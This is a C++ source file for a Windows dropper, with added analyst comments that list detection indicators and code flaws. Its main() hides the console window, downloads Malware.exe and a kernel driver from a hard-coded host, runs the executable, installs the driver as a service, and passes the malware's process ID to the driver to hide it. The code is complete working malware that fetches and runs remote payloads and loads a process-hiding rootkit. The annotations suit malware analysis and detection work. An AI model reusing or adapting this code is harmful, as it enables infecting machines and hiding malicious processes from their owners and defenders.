#include <stdio.h>
#include <Windows.h>
#include <Winbase.h>
#include <Tlhelp32.h>
#include <strsafe.h>
#include <stdlib.h>
#include <winsock.h>
#include <wininet.h>
#include <atlstr.h>
#pragma comment(lib,"Wininet.lib")
#define READ_BUF_SIZE 1024
/*
 * Registers the kernel driver "DKOM_Driver" with the Service Control Manager
 * and starts it.
 *
 * Both the service name and the driver image path are hard-coded; the image
 * path is a .sys file inside one specific user's %TEMP% directory (main()
 * downloads the file to that same path before calling this).
 *
 * Returns true when the service is running on exit (either freshly started or
 * StartService reported ERROR_SERVICE_ALREADY_RUNNING), false on any SCM or
 * service failure. Failures are only printed to stdout; the GetLastError()
 * value is not propagated to the caller.
 *
 * Analyst notes:
 *  - OpenSCManager is requested with SC_MANAGER_ALL_ACCESS, so the process
 *    must already hold administrative rights; nothing here elevates.
 *  - A SERVICE_KERNEL_DRIVER service whose ImagePath lives under a user's
 *    Temp folder is the high-signal artifact to detect (System log event 7045
 *    "A service was installed", plus driver-load telemetry such as Sysmon
 *    event 6). Restricting SCM access and driver loads to approved paths is
 *    the corresponding mitigation.
 *  - The identifier begins with an underscore at global scope, which C++
 *    reserves for the implementation; harmless in practice but non-portable.
 */
bool _util_load_sysfile()
{
    LPCTSTR theDriverName = TEXT("DKOM_Driver");
    LPCTSTR aPath = TEXT("C:\\Users\\eternalklaus\\AppData\\Local\\Temp\\DKOM_Driver.sys");
    SC_HANDLE sh = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    if (!sh)
    {
        // NOTE(review): the only failure path that prints nothing.
        return false;
    }
    // NOTE(review): %s with an LPCTSTR is only correct in a non-UNICODE build;
    // the rest of the file passes narrow strings to TCHAR APIs, so that is
    // presumably the build configuration -- confirm.
    printf("loading %s\n", aPath);
    // Service type SERVICE_KERNEL_DRIVER, demand start, no dependencies or
    // account: the SCM will load aPath as a kernel driver on StartService.
    SC_HANDLE rh = CreateService(sh, theDriverName, theDriverName, SERVICE_ALL_ACCESS, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL, aPath, NULL, NULL, NULL, NULL, NULL);
    if (!rh)
    {
        // A service of that name already exists (e.g. from an earlier run):
        // reuse it instead of failing.
        if (GetLastError() == ERROR_SERVICE_EXISTS)
        {
            rh = OpenService(sh, theDriverName, SERVICE_ALL_ACCESS);
            if (!rh)
            {
                printf("Cannot open service\n");
                CloseServiceHandle(sh);
                return false;
            }
        }
        else
        {
            printf("Cannot create service\n");
            CloseServiceHandle(sh);
            return false;
        }
    }
    // NOTE(review): rh is always non-NULL here (every NULL path above has
    // returned), so this test is redundant.
    if (rh)
    {
        // StartService returns 0 on failure; "already running" is treated as
        // success, every other error aborts.
        if (0 == StartService(rh, 0, NULL))
        {
            DWORD imsi = GetLastError();
            if (imsi == ERROR_SERVICE_ALREADY_RUNNING)
            {
                printf("Service is already running\n");
            }
            else
            {
                printf("Cannot start service\n");
                CloseServiceHandle(sh);
                CloseServiceHandle(rh);
                return false;
            }
        }
        CloseServiceHandle(sh);
        CloseServiceHandle(rh);
    }
    // Reached both after a fresh start and after ERROR_SERVICE_ALREADY_RUNNING.
    printf("Service started successfully\n");
    return true;
}
/*
 * Downloads pszUrl over WinINet and writes the body to the local path pszFile
 * (opened with "wb", so an existing file is truncated).
 *
 * Returns the number of bytes written, as an int (dwReadSize is a DWORD and
 * is narrowed on return). Returns 0 both for an empty body and for every
 * failure -- InternetOpen, InternetOpenUrl or fopen failing -- so callers
 * cannot distinguish "downloaded nothing" from "could not download"; main()
 * ignores the value entirely.
 *
 * Analyst notes:
 *  - The user agent is the fixed string "MyWeb" and the access type is
 *    INTERNET_OPEN_TYPE_DIRECT (no proxy), both usable as network indicators.
 *  - Neither InternetReadFile nor fwrite has its return value checked, so a
 *    transport error mid-stream silently yields a truncated file; there is no
 *    integrity check on what was fetched.
 *  - The loop exit is unusual: see the comment on the while condition.
 */
int getFileFromHttp(char* pszUrl, char* pszFile)
{
    HINTERNET hInet, hUrl;
    DWORD dwReadSize = 0;
    // Initialise WinINet.
    if ((hInet = InternetOpen(TEXT("MyWeb"), // user agent in the HTTP protocol
        INTERNET_OPEN_TYPE_DIRECT, // AccessType
        NULL, // ProxyName
        NULL, // ProxyBypass
        0)) != NULL) // Options
    {
        // Open the given HTTP URL.
        if ((hUrl = InternetOpenUrl(hInet, // Internet session handle
            pszUrl, // URL
            NULL, // Headers sent to the HTTP server
            0, // Header size
            0, // Flag
            0)) != NULL) // Context
        {
            FILE *fp;
            // Create the file the download is written into.
            if ((fp = fopen(pszFile, "wb")) != NULL)
            {
                // NOTE(review): szBuff is TCHAR[READ_BUF_SIZE] but the read
                // limit below is READ_BUF_SIZE bytes; the two only coincide in
                // a non-UNICODE build (in a UNICODE build the buffer is simply
                // larger than needed, so there is no overflow either way).
                TCHAR szBuff[READ_BUF_SIZE];
                DWORD dwSize;
                DWORD dwDebug = 10;
                do {
                    // Read the next chunk from the web. The BOOL result is
                    // ignored; on failure dwSize may not be meaningful.
                    InternetReadFile(hUrl, szBuff, READ_BUF_SIZE, &dwSize);
                    // Append the chunk to the local file (result unchecked).
                    fwrite(szBuff, dwSize, 1, fp);
                    dwReadSize += dwSize;
                    // Exit only after ten zero-length reads in total: dwDebug is
                    // decremented solely when dwSize == 0 (short-circuit), never
                    // reset, and the loop ends when it reaches 0. A normal
                    // end-of-stream therefore costs nine extra empty reads.
                } while ((dwSize != 0) || (--dwDebug != 0));
                fclose(fp);
            }
            // Close the URL handle.
            InternetCloseHandle(hUrl);
        }
        // Close the session handle.
        InternetCloseHandle(hInet);
    }
    return(dwReadSize);
}
/*
 * Looks up a process by image name via a Toolhelp32 process snapshot.
 *
 * ProcessName is compared case-insensitively (lstrcmpi) against
 * PROCESSENTRY32::szExeFile, and the PID of the first matching entry is
 * returned. Returns 0 when no process matches or the snapshot cannot be
 * walked.
 *
 * NOTE(review): CreateToolhelp32Snapshot returns INVALID_HANDLE_VALUE (not
 * NULL) on failure and that is never checked here; Process32First would then
 * fail and the function returns 0, but CloseHandle is still called on the
 * invalid handle. If several processes share the name, only the first one in
 * snapshot order is reported.
 */
DWORD MyGetProcessId(LPCTSTR ProcessName) // non-conflicting function name
{
    PROCESSENTRY32 pt;
    HANDLE hsnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    // dwSize must be set before Process32First or the call fails.
    pt.dwSize = sizeof(PROCESSENTRY32);
    if (Process32First(hsnap, &pt)) { // must call this first
        do {
            if (!lstrcmpi(pt.szExeFile, ProcessName)) {
                CloseHandle(hsnap);
                return pt.th32ProcessID;
            }
        } while (Process32Next(hsnap, &pt));
    }
    CloseHandle(hsnap); // close handle on failure / no match
    return 0;
}
/*
 * Entry point. Sequence, as written: hide the console window, download two
 * files (an executable and a .sys) from a hard-coded LAN address into one
 * user's %TEMP% directory, launch the executable, register and start the .sys
 * as a kernel driver, open the driver's device object, look up the launched
 * process's PID and write that PID (4 bytes) to the device.
 *
 * What the driver does with the PID is not visible in this file; the success
 * message calls it hiding the process, which is the only evidence here.
 *
 * Returns 0 on success, -1 when the PID lookup or the device open fails.
 *
 * Analyst notes / observable artifacts, all from the literals below:
 *  - HTTP fetches from 192.168.140.133 with user agent "MyWeb", writes under
 *    C:\Users\eternalklaus\AppData\Local\Temp\, then ShellExecute of the
 *    downloaded .exe.
 *  - Service installation of "DKOM_Driver" (see _util_load_sysfile) followed
 *    by a CreateFile on \\.\DKOM_Driver and a single 4-byte WriteFile.
 *  - The return value of every download and of _util_load_sysfile() is
 *    ignored, so the chain proceeds even when an earlier step failed.
 */
int main()
{
    // Hide the console window.
    HWND hWndConsole = GetConsoleWindow();
    ShowWindow(hWndConsole, SW_HIDE);
    HANDLE hFile;
    DWORD ProcessId, write;
    // Download the payload files.
    // NOTE(review): char* initialised from string literals is a deprecated
    // conversion in C++; const char* would be required in newer standards.
    char *Malware = "C:\\Users\\eternalklaus\\AppData\\Local\\Temp\\Malware.exe";
    char *driver = "C:\\Users\\eternalklaus\\AppData\\Local\\Temp\\DKOM_Driver.sys";
    // Byte counts returned by getFileFromHttp are discarded; a failed download
    // (return 0) is not detected and the next steps run anyway.
    getFileFromHttp("http://192.168.140.133/Malware.exe", Malware);
    getFileFromHttp("http://192.168.140.133/DKOM_Driver.sys", driver);
    // Run Malware.exe.
    ShellExecute(NULL, "open", "C:\\Users\\eternalklaus\\AppData\\Local\\Temp\\Malware.exe", NULL, NULL, SW_SHOW);
    // Install the device driver. The bool result is ignored.
    _util_load_sysfile();
    // Open the driver's device; INVALID_HANDLE_VALUE is only checked further
    // down, after the PID lookup.
    hFile = CreateFile("\\\\.\\DKOM_Driver", GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
    // NOTE(review): there is no wait between ShellExecute and this lookup, so
    // whether the new process is already in the snapshot is timing-dependent.
    ProcessId = MyGetProcessId(TEXT("Malware.exe"));
    // NOTE(review): %d with a DWORD; %lu is the matching specifier (same for
    // the two GetLastError() prints below).
    printf("Malware.exe : ProcessId is %d\n ", ProcessId);
    // Error handling 01: no such process.
    if (ProcessId == 0) {
        printf("cannot find processid!!\n");
        // NOTE(review): hFile (if valid) is leaked on this return; it is never
        // closed on the success path either.
        return -1;
    }
    // Error handling 02: device could not be opened.
    if (hFile == INVALID_HANDLE_VALUE)
    {
        printf("Error:(%d)\nMake sure the driver is loaded.\n", GetLastError());
        return -1;
    }
    // Hand the PID to the driver. (The original comment said "chrome.exe",
    // but the PID written is the one looked up for Malware.exe above.)
    if (!WriteFile(hFile, &ProcessId, sizeof(DWORD), &write, NULL))
    {
        printf("\nError: Unable to hide process (%d)\n", GetLastError());
    }
    else
    {
        printf("\nProcess successfully hidden.\n");
    }
    return 0;
}